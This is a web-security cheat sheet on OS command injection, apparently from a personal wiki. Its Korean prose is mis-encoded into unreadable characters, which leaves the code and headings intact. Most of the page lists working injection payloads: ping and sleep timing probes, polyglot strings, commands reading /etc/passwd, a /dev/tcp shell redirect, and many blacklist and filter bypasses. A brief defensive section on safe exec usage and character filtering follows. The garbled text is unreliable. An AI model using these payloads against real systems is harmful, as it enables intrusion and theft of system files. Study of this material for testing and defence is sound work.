Back

Command Injection

๐Ÿ” Introduction

Command Injection์€ ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์ด systemcall ๋“ฑ OS command๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๋ถ€๋ถ„์ด ์žˆ๊ฑฐ๋‚˜, application๋‹จ์—์„œ ๋ณ„๋„์˜ command๋ฅผ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๊ฐ€ Injection์„ ํ†ตํ•ด ์˜๋„ํ•œ ๋ช…๋ น์„ ์ˆ˜ํ–‰ํ•˜๋Š” ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ๋Š” Whitebox๋‚˜ Graybox ํ…Œ์ŠคํŒ…์—์„œ exec ๋“ฑ command ์ฒ˜๋ฆฌ๋ฅผ ํ•˜๋Š” ํ•จ์ˆ˜ ์œ„์ฃผ๋กœ ๋ถ„์„ํ•˜๋ฉด ์‰ฝ๊ฒŒ ์ฐพ์„ ์ˆ˜ ์žˆ์ง€๋งŒ, ์˜จ์ „ํ•˜๊ฒŒ Blackbox ํ…Œ์ŠคํŒ…์„ ํ•ด์•ผํ•˜๋Š” ๊ฒฝ์šฐ ์ด ๊ตฌ๊ฐ„์„ ์‹๋ณ„ํ•˜๋Š”๊ฒŒ ์‰ฝ์ง€๋Š” ์•Š์Šต๋‹ˆ๋‹ค.

Fuzzing์„ ํ†ตํ•ด Command Injection์— ์˜ํ–ฅ์„ ์ค„ ์ˆ˜ ์žˆ๋Š” ์š”์ฒญ์„ ์ „์†กํ•˜๊ณ , ์ด์— ๋”ฐ๋ฅธ Response์™€ Response-time ๋“ฑ์„ ๋ณด๊ณ  ๋ฐฑ์—”๋“œ์— Command ์ฒ˜๋ฆฌ๋ฅผ ํ•˜๋Š” ๋ถ€๋ถ„์ด ์žˆ๋Š”์ง€ ์‹๋ณ„ํ•ด์•ผํ•ฉ๋‹ˆ๋‹ค.

# Original
/proc?filename=test.txt

# Backend
exec("cat "+filename)
/proc?filename=test.txt`ping -c 5 127.0.0.1`
/proc?filename=test.txt$(ping -c 5 127.0.0.1)
/proc?filename=test.txt|ping -c 5 127.0.0.1|
/proc?filename=test.txt&ping -c 5 127.0.0.1&
/proc?filename=test.txt\nping -c 5 127.0.0.1\n
/proc?filename=test.txt>ping -c 5 127.0.0.1>
/proc?filename=test.txt<ping -c 5 127.0.0.1>
/proc?filename=test.txt-ping -c 5 127.0.0.1
/proc?filename=test.txt;ping -c 5 127.0.0.1;
๋“ฑ...

๋ฐฑ์—”๋“œ์—์„œ filename์„ cli๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ ์œ„ ํŠน์ˆ˜๋ฌธ์ž ๊ตฌ๋ฌธ์œผ๋กœ ์ธํ•ด ๊ณต๊ฒฉ์ž๊ฐ€ ์˜๋„ํ•œ ๋ช…๋ น ping -c 5 127.0.0.1 ์ด ์ˆ˜ํ–‰๋˜๋ฉด localhost์— 5๋ฒˆ ping์„ ๋‚ ๋ฆฌ๊ธฐ ๋•Œ๋ฌธ์— 5์ดˆ์˜ ๋”œ๋ ˆ์ด๊ฐ€ ๋ฐœ์ƒํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ Response time ๋ณด๊ณ  ์ฒดํฌํ•˜๋ฉด ์‹ค์ œ ๋ช…๋ น์ด ์ˆ˜ํ–‰ ๋ฌ๋Š”์ง€ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

(๊ฐœ์ธ์ ์œผ๋ก  Blind RCE ์ผ€์ด์Šค๋„ ๋งŽ์•˜๊ธฐ ๋•Œ๋ฌธ์— ping ์ด๋‚˜ sleep์œผ๋กœ time ๊ธฐ๋ฐ˜ ์ฒดํฌํ•˜๋Š”๊ฒŒ ๊ฐ€์žฅ ์ •ํ™•ํ–ˆ์Šต๋‹ˆ๋‹ค)

๋•Œ๋•Œ๋กœ ์–ด๋–ค Application๋“ค์€ ํŒŒ๋ผ๋ฏธํ„ฐ์—์„œ command ์ž์ฒด๋ฅผ ๋ฐ›๋Š” ๊ฒฝ์šฐ๋„ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ๋Š” ์‰ฝ๊ฒŒ ์‹๋ณ„์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

/proc?cmd=curl%20api-server.domain/check

Polyglot payload

# case 1
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

# e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}

# case 2
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

# e.g:
echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'

Exploitation

๋ช…๋ น์„ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— OS์˜ ์ค‘์š”์ •๋ณด๋ฅผ ๊ฐ€์ ธ์˜ค๊ฑฐ๋‚˜, Shell์„ ๋‚ด๋ ค์„œ ์ถ”๊ฐ€์ ์ธ ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Shell์„ ๋‚ด๋ฆฌ๋Š” ๋ฐฉ๋ฒ•์—๋Š” ์—ฌ๋Ÿฌ๊ฐ€์ง€๊ฐ€ ์žˆ๊ฒ ์ง€๋งŒ, ๊ฐ„๋‹จํ•˜๊ฒŒ๋Š” nc ๋“ฑ์„ ์ด์šฉํ•ด์„œ linsten ์‹œํ‚จ ํ›„ ์ ‘๊ทผํ•˜์—ฌ ์‰˜์„ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ Metasploit์„ ์‚ฌ์šฉํ•˜์—ฌ ์‰˜์„ ๋‚ด๋ฆฌ๋Š” ๋ฐฉ๋ฒ•์ด ์žˆ์Šต๋‹ˆ๋‹ค. metasploit์˜ meterpreter shell์„ ์‚ฌ์šฉํ•˜๋ฉด ๋Œ€์ƒ ์‹œ์Šคํ…œ์—์„œ ๋‹ค์‹œ ํ–‰์ด๋™ ํ•˜๊ธฐ ์ข‹๊ธฐ ๋•Œ๋ฌธ์— ๋งŒ์•ฝ ๋‚ด๋ถ€ ์นจํˆฌ๊นŒ์ง€ ์ง„ํ–‰ํ•œ๋‹ค๋ฉด meterpreter shell์„ ์ถ”์ฒœํ•ฉ๋‹ˆ๋‹ค. (๋ฌผ๋ก  ๋ฐฑ์‹ ์— ์•ˆ๊ฑธ๋ฆฌ๊ฒŒ payload encode๋ฅผ ์ž˜ ์งœ์•ผ๊ฒ ์ฃ )

Bypass protection

Bypass without space

linux

$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash

$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu

$ sh</dev/tcp/127.0.0.1/4242

$ IFS=,;`cat<<<uname,-a`

Windows

ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Bypass with a line return

something%0Acat%20/etc/passwd

Bypass characters filter via hex encoding

Linux

$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"/etc/passwd

$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

Bypass characters filter

$ echo ${HOME:0:1}
/

$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

$ echo . | tr '!-0' '"-1'/

$ tr '!-0' '"-1' <<< .
/

$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

Bypass Blacklisted words

single quote

w'h'o'am'i

double quote

w"h"o"am"i

backslash

w\ho\am\i
/\b\i\n/////s\h

$@

who$@ami

echo $0
-> /usr/bin/zsh
echo whoami|$0

???

/???/??t /???/p??s??

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

wildcard(*)

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

๐Ÿ›ก Defensive techniques

๋ณดํ†ต ์„œ๋น„์Šค์—์„œ systemcall ๋“ฑ์„ ์‚ฌ์šฉํ•ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ application libarary์˜ ๊ธฐ๋Šฅ์„ ํ†ตํ•ด sandbox ์ฒ˜๋Ÿผ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ์‰˜ ์ดํ›„๋กœ ๋„˜์–ด๊ฐ€์ง€ ๋ชปํ•˜๋„๋ก ์ฒ˜๋ฆฌํ•˜๊ฑฐ๋‚˜ ๊ณต๊ฒฉ์— ์‚ฌ์šฉ๋˜๋Š” ํŠน์ˆ˜๋ฌธ์ž๋ฅผ ํ•„ํ„ฐ๋งํ•˜๋Š” ํ˜•ํƒœ๋กœ ๋Œ€์‘ํ•ฉ๋‹ˆ๋‹ค.

Library protection

// golang์˜ ๋Œ€ํ‘œ์ ์ธ exec ๋ฐฉ์–ด ์ฒ˜๋ฆฌ
// ์ด ๊ฒฝ์šฐ filename์— ์•„๋ฌด๋ฆฌ ํŠน์ˆ˜๋ฌธ์ž๋ฅผ ๋„ฃ์–ด ๋ณ„๋„์˜ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋ ค๊ณ  ํ•ด๋„ cat ํ•˜์œ„์˜ ์ธ์ž๊ฐ’์œผ๋กœ๋งŒ ์ฒ˜๋ฆฌ๋ฉ๋‹ˆ๋‹ค.
cmd := exec.Command("cat", filename)
err := cmd.Start()

๋‹ค๋งŒ ๋ณดํ†ต ์ด๋Ÿฌํ•œ ๊ณผ์ •์ด ๊ฐœ๋ฐœ์— ๋ถˆํŽธํ•จ์„ ๊ฐ€์ง€๊ธฐ ๋•Œ๋ฌธ์— ๋ช…๋ น์„ ์œ ๋™์ ์œผ๋กœ ๋ฐ›๋Š” ๊ฒฝ์šฐ ์•„๋ž˜์™€ ๊ฐ™์ด bash -c ๋“ฑ์œผ๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ฒฝ์šฐ๋„ ๋งŽ์Šต๋‹ˆ๋‹ค. (์ด๋Ÿฌํ•œ ๊ฒฝ์šฐ๋Š” ์ทจ์•ฝํ•˜๊ฒ ์ฃ )

cmd := exec.Command("bash", "-c", afterCmd)
err := cmd.Start()

Escape special chars

ํŠน์ˆ˜๋ฌธ์ž ์ œํ•œ์˜ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์— ์ฃผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ํŠน์ˆ˜๋ฌธ์ž์— ๋Œ€ํ•ด ์ œํ•œํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ฒ˜๋ฆฌ๋ฉ๋‹ˆ๋‹ค.

  • |
  • $
  • (
  • )
  • &
  • |
  • \r\n (CRLF)
  • >
  • <
  • -
  • ;
  • ๋“ฑ

๐Ÿ•น Tools

๐Ÿ“š Articles

๐Ÿ“Œ References

Licensed under CC BY-NC-SA 4.0